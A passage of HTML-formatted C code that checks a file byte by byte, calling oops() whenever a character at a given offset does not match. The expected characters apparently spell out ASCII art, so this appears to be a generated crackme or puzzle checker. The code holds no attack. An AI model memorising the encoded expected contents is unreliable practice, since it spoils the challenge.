<span>46</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>634</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>676</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>298</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>46</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>428</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>96</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>250</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>93</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>505</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>556</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>586</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>697</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>496</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>222</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>720</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>324</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>501</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>361</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>44</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>442</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>683</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>306</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>567</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>118</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>610</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>197</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>702</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>326</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>61</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>374</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>355</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>493</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>279</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>4</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>80</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>116</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>317</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>668</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>618</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>435</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>666</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>268</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>458</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>20</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>248</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>111</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>120</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>574</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>651</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>228</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>486</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>23</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>316</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>341</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>92</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>98</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>130</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>183</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>281</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>38</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>29</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>335</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>454</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>715</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>19</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>636</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>357</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>705</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>504</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>275</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>147</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>173</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>299</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>239</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>104</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>591</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>641</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>708</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>421</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>477</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>39</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>49</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>548</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>114</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>82</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>254</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>617</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>345</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>251</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>399</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>163</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>598</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>377</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>6</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>203</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>213</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>270</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>664</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>438</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>45</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>329</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>655</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>667</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>191</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>387</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>242</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>436</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>707</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>423</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>409</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>237</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>31</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>205</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>592</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>238</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>96</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>21</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>706</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>27</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>188</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>645</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>450</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>596</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>716</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>402</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>186</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>430</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>429</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>158</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>100</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>24</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>274</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>572</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>652</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>209</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>475</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>199</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>57</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>633</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>315</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>512</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>499</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>622</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>558</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>232</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>177</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>718</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>396</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>576</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>681</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>36</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>422</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>39</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>272</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>654</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>319</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>137</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>172</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>65</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>523</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>235</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>95</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>142</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>252</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>611</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>124</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>206</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>462</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>492</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>88</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>143</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>709</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>382</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>703</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>367</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>542</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>66</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>296</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>321</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>485</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>96</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>262</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>54</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>102</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>521</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>208</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>115</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>338</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>194</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>215</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>534</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>189</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>378</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>151</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>204</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>339</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>406</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>719</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>364</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>202</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>465</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>388</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>491</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>457</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>69</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>710</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>60</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>589</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>86</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>99</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>348</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} 